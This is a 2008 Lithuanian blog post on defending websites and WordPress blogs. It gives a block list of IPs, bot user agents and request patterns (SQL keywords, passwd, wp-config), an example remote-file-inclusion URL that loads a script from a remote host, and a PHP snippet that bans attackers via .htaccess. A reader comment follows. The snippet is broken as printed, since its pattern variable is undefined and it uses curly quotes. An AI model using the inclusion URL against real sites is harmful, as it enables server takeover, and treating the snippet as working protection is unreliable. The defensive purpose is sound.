Darbas namuose / namie

Būtina tinklaraščio ir tinklalapių apsauga

Paskelbta 19 December 2008
Pažymėta: Saugumas

Tikriausiai žinote, kad daugeliu atvejų tinklalapius ar tinklaraščius bandoma nulaužti, prišiukšlinti, užteršti įvairiais beprasmiais anoniminiais komentarais automatizuotai, naudojant tam tikrus scriptus. Žinoma gana dažnai taikomas ir rankinis būdas. Net neįsivaizduojate, koks tai ganėtinai įspūdingas skaičius. Abie atvejais vienas gynybos būdas tikrai yra – tikrinti užklausas, IP bei kitus parametrus siunčiamas piktavalio ir jas blokuoti. Tiesiog pasinaudokite mano siūlomais būdais, ir ne tik apsiginsite, bet ir sužinosite, kaip kas ir kaip dažnai jus puola. Daugiau…

Tinklaraščio apsauga

Nors tinklalapiams pateiksiu “rankinį” būda, naudojantiems Wordpress yra speciali apsauga, leidžianti turėti saugesnį ir švaresnį tinklapį - TimesToCome Security Plugin. Įdiegę šį įskiepį turėsite įrašyti apsauginius parametrus. Asmeniškai aš naudoju tokius blokuojamus IP, user agents ir užklausas – dalį priežasčių, kaip sugavau galite matyti čia (jūs galite naudoti ir savo įrašus). Ir nors ten matote net Firefox, Internet explorer – dažniausiai tai taip pavadinti botai.

Įspėjimas. Nepriisiimu jokios atsakomybės dėl čia pateiktų blokuojamų IP, User Agents, užklausų, palieku kiekvienam lankytojui spręsti ar bet kuris įrašas yra tikslingas.

Blokuojami IP: (This is your ip banished list:)	Blokuojami User Agents (This is your agent banished list)	Blokuojamos užklausos (This is your request blacklist)
12.192.82.221 121.151.44.115 121.209.51.58 122.133.106.125 123.224.54.112 124.59.113.24 125.141.64.124 128.163.2.43 131.220.64.240 137.48.217.20 142.165.135.180 150.187.25.20 151.13.233.147 158.109.36.140 160.99.12.231 189.104.241.248 190.183.61.18 190.196.2.205 190.196.5.189 193.171.110.146 193.207.106.54 193.253.223.90 193.41.90.11 193.64.244.176 194.165.49.171 194.219.192.251 194.244.39.57 195.234.106.106 195.47.9.2 200.203.121.1 200.49.155.60 201.8.240.141 201.9.129.198 202.47.4.161 203.88.114.169 208.116.39.133 209.12.244.192 209.172.33.53 209.195.110.123 209.216.249.151 209.240.239.2 211.45.156.100 212.34.184.239 212.85.146.235 213.203.223.25 213.91.210.194 216.206.238.35 216.246.228.87 216.82.211.137 217.198.149.178 217.64.177.199 218.186.13.3 218.234.19.139 219.104.211.129 220.86.116.174 221.153.3.136 222.122.179.42 222.164.209.65 222.96.185.28 24.109.59.229 24.200.137.142 124.179.227.139 24.66.10.194 38.117.65.239 58.177.86.197 59.11.15.187 91.121.87.84 60.52.22.176 61.47.10.168 62.103.159.31 62.128.242.180 62.193.211.155 62.75.185.209 62.80.243.201 63.247.43.250 64.15.155.201 64.185.237.191 64.21.98.196 64.246.187.54 65.254.54.218 65.254.63.210 65.95.110.16 65.95.153.184 65.98.67.106 66.135.41.76 66.98.244.93 67.15.48.60 67.18.29.218 67.202.60.246 67.219.69.45 67.68.20.251 67.70.127.164 67.71.176.187 68.147.159.38 69.128.204.74 69.14.152.152 69.157.22.63 69.159.63.161 69.94.120.198 70.85.201.66 70.86.30.82 70.87.240.50 71.101.46.11 71.121.104.178 71.43.15.172 72.233.69.58 72.29.77.72 72.49.255.51 72.55.131.17 72.69.137.26 74.210.176.55 74.6.17.188 75.125.143.162 76.66.125.33 76.68.22.147 76.71.160.65 77.189.155.254 77.203.192.230 78.111.68.37 78.130.75.90 78.164.157.213 78.42.74.174 79.133.236.143 79.136.97.34 79.66.133.114 79.76.213.251 80.146.78.213 80.218.173.93 80.233.176.183 80.53.133.106 81.2.200.22 82.194.67.123 82.225.55.136 82.37.19.52 82.98.141.70 83.160.222.29 83.17.224.250 83.240.164.232 83.65.47.4 83.81.61.72 84.165.87.140 84.72.120.152 85.114.140.133 85.157.139.109 85.171.82.87 85.192.189.233 85.235.40.30 85.25.10.95 85.96.215.53 86.1.196.79 86.109.167.160 86.109.96.134 86.145.194.229 87.101.4.49 87.106.222.144 87.234.201.76 87.61.174.29 88.119.99.10 88.214.192.29 88.223.50.146 88.244.162.64 88.252.145.65 88.252.149.114 89.111.173.68 89.42.133.2 91.121.204.165 91.186.11.35 91.84.19.133 91.89.198.178 92.233.76.213 92.4.112.196 64.233.183.* 61.103.33.48 92.61.36.98 96.247.65.124	AnotherBot botpaidtoclick Click Bot cr4nk DA 5.3 DataCha0s discobot EBM-APPLE EmailSearch EmailSiphon FAST ESP Document Retriever Firefox 2.0 Ginxbot GrubNG gvfs HTTrack Incutio Indy Library Internet Explorer Internet Ninja Java JetBrains libcurl libwww-perl lwp-request lwp-trivial Macintosh; I; PPC Microsoft Data Access MJ12bot Morfeus Fucking Scanner Mozilla Firefox 5.0 Mozilla/4.0(compatible Mozilla/4.08 Mozilla/4.61 (Macintosh Mozilla/5/0(compatible Mozilla/7.0 Mozilla/8 Mozilla/Firefox Mp3Bot MSIE6 NIPGCrawler PEAR PECL PHPot Provider Protocol Discover PuxaRapido PycURL Python-urllib Security Kol Site Sniper SkyGrid Sogou sun4m Sunrise syncrisis topicblogs User-Agent W3CRobot w:PACBHO60 Web::Scraper WebDav WebRipper Wget window.location Winnie Poh www.ranks.nl X12R1 Xerka-bot	$_GET (java\|vb) .gif? .jpg? .txt? .xml? </script> <SCRIPT> ?page_id=http%3A%2F%2F admin-ajax.php? admin-function.php? ASCII board.php?see=ftp CAST com_jd-wp CONCAT DECLARE DELETE formmail includedir= index.php?template= INSERT lwp-trivial OPTIONS passwd PATH= POST /xmlrpc.php PROPFIND register++++ SELECT sidebar.php? UNION UPDATE word-tube-button.php? wp-config wp-login.php?action=http%3A%2F%2F wp-table-button.php? wp-trackback.php? x-aaaaaaaaa

Ką reiškia užklausos ir kodėl jas reikia blokuoti? Tarkim jūsų tinklapyje yra numanoma spraga arba tiesiog papuolėte į atakuojančio akiratį (bet dažnai atakuojantys tiesiog vykdo atakuojančias užklausas iš eilės).

Tarkim esant file sidebar.php nesaugiai panaudotam kintamajam KINTAMASIS su užklausa sidebar.php?KINTAMASIS=http://www.kompiuteriszombis.com/botas.txt , jusu serveryje bus įvykdytas botas.txt scriptas, ir galima sakyti, daugeliu atvejų jūsų serveris jau nulaužtas.

Tinklalapio apsauga.

Jei turite tinklapį, galite pasinaudoti tokiu scriptu, kurį turite įrašyti į savo index.php , taip pat nemapirškite pakeisti email@email.com į savo el. paštą

/* ****************************** ANTIHACK START ******************************/

//injection check
$req = $_SERVER['REQUEST_URI'];
$cadena = explode("?", $req);
$mi_url = $cadena[0];
$resto = $cadena[1];

// detecting
if (preg_match($inyecc, $resto) && !$_REQUEST['fullurl']) {

   // make something, in example send an e-mail alert to administrator
   //$ip = $HTTP_SERVER_VARS["HTTP_CLIENT_IP"];
   $ip = $_SERVER['REMOTE_ADDR'];
   $forwarded = $HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"];
   $remoteaddress = $HTTP_SERVER_VARS["REMOTE_ADDR"];

   $message = "attack injection in $mi_url \n\nchain: $resto \n\n
   from: (ip-forw-RA):- $ip - $forwarded - $remoteaddress\n\n
   ——— end ——————–";
   mail(email@email.com, "Attack injection", $message,
   "From: info@{$_SERVER['SERVER_NAME']}", "-fwebmaster@{$_SERVER['SERVER_NAME']}");

    ####Uzbaninam per .htaccess
    $fh = fopen(’.htaccess’, ‘a’) or die("Failo atidaryti neÄÆmanoma.");
    $towrite = "\n# $remoteaddress - $resto";
    $towrite .= "\ndeny from $ip\n";
    fwrite($fh, $towrite);

fclose($fh);

####

   // message and kill execution
   echo ‘illegal url’;
   die();
}
/* ****************************** ANTIHACK END******************************/

Sergej 'ZaZa' Kurakin rašė:
2008 12 20 10:12

Tokiems dalikams jau senai yra sukurtas Apache mod_security - manau nereikia išradineti dviračių.

Kas dėl preg’o - liko nepaminėtas “ftp” protokolas, “delete” SQL užklausą. Be to tikrinami ne tik užklausos reikšmės, bet ir kintamujų vardai - todėl prieš panaudojant ši kodą kiekvienas privalo ji gerokai apsvarstyti, ar naudoti,

Beja, SQL-injection galima padaryti ir per į kairę nuo “?” eančia adreso dalį.

Jei sistemos kodas yra kreivas - vien GET užklausos apsaugos nepakaks, prireiks filtruoti POST bei COOKIES.

Butu žymiai maloniau matyti Lietuviškus kodo komentarus visur, o ne tik kai kur.

Na ir pašymas į .htaccess failą - nėra pats saugiausias užsiemimas. Savaime aišku, viskas priklauso nuo prieglobos sistemos.